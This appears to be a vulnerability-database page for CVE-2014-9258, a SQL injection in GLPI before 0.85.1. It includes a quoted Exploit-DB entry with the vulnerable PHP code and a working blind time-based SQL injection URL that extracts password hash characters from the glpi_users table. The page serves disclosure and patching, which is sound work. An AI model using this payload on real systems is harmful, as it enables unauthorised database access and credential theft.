CVE-2014-9258
medium
CVSS v3
โ
CVSS v4 NEW
โ
VIR risk
7.5
Description
SQL injection vulnerability in ajax/getDropdownValue.php in GLPI before 0.85.1 allows remote authenticated users to execute arbitrary SQL commands via the condition parameter.
Predictions
Exploit likelihood
20%
Patch ETA
โ
Heuristic predictions, AS-IS, for prioritization only.
Mitigations
No mitigations published for this CVE yet.
The vendor-content worker queues fetches as references arrive (check back in a few minutes). Or โ if you've already worked around this in production โ publish your fix to the community-verified tier.
โ Propose a mitigation on Community โ Mitigations published via the community go through AI scoring + 2 human reviewers + 7-day silent objection window before landing here withsource_tier=community-verified.
Exploits
Public proof-of-concept code below. AS-IS, for defenders and authorised testing only.
Exploit-DB
GLPI 0.85 - Blind SQL Injection
# Exploit Title: GLPI 0.85 Blind SQL Injection
# Date: 28-11-2014
# Exploit Author: Kacper Szurek - http://security.szurek.pl/ http://twitter.com/KacperSzurek
# Software Link: https://forge.indepnet.net/attachments/download/1899/glpi-0.85.tar.gz
# CVE: CVE-2014-9258
# Category: webapps
1. Description
$_GET['condition'] is not escaped correctly.
File: ajax\getDropdownValue.php
if (isset($_GET['condition']) && !empty($_GET['condition'])) {
$_GET['condition'] = rawurldecode(stripslashes($_GET['condition']));
}
if (isset($_GET['condition']) && ($_GET['condition'] != '')) {
$where .= " AND ".$_GET['condition']." ";
}
$query = "SELECT `$table`.* $addselect
FROM `$table`
$addjoin
$where
ORDER BY $add_order `$table`.`completename`
$LIMIT";
if ($result = $DB->query($query)) {
}
http://security.szurek.pl/glpi-085-blind-sql-injection.html
2. Proof of Concept
http://glpi-url/ajax/getDropdownValue.php?itemtype=group&condition=1 AND id = (SELECT IF(substr(password,1,1) = CHAR(36), SLEEP(5), 0) FROM `glpi_users` WHERE ID = 2)
3. Solution:
Update to version 0.85.1
http://www.glpi-project.org/spip.php?page=annonce&id_breve=334&lang=en
https://forge.indepnet.net/attachments/download/1928/glpi-0.85.1.tar.gzApplication impact
| Vendor | Product | Versions | Fixed |
|---|---|---|---|
| glpi-project | glpi | {"endIncluding":"0.85"} | |
References
- http://advisories.mageia.org/MGASA-2015-0017.html
- http://lists.fedoraproject.org/pipermail/package-announce/2015-January/147271.html
- http://lists.fedoraproject.org/pipermail/package-announce/2015-January/147296.html
- http://lists.fedoraproject.org/pipermail/package-announce/2015-January/147313.html
- http://osvdb.org/show/osvdb/115957
- http://secunia.com/advisories/61367
- http://security.szurek.pl/glpi-085-blind-sql-injection.html
- http://www.exploit-db.com/exploits/35528
- http://www.glpi-project.org/spip.php?page=annonce&id_breve=334&lang=en
- http://www.mandriva.com/security/advisories?name=MDVSA-2015:167
- http://advisories.mageia.org/MGASA-2015-0017.html
- http://lists.fedoraproject.org/pipermail/package-announce/2015-January/147271.html
- http://lists.fedoraproject.org/pipermail/package-announce/2015-January/147296.html
- http://lists.fedoraproject.org/pipermail/package-announce/2015-January/147313.html
- http://osvdb.org/show/osvdb/115957
- http://secunia.com/advisories/61367
- http://security.szurek.pl/glpi-085-blind-sql-injection.html
- http://www.exploit-db.com/exploits/35528
- http://www.glpi-project.org/spip.php?page=annonce&id_breve=334&lang=en
- http://www.mandriva.com/security/advisories?name=MDVSA-2015:167
CWEs
CWE-89
Community-verified mitigations for this CVE will appear above when contributors publish them.
Verify integrity in audit chain (admin only). AS-IS.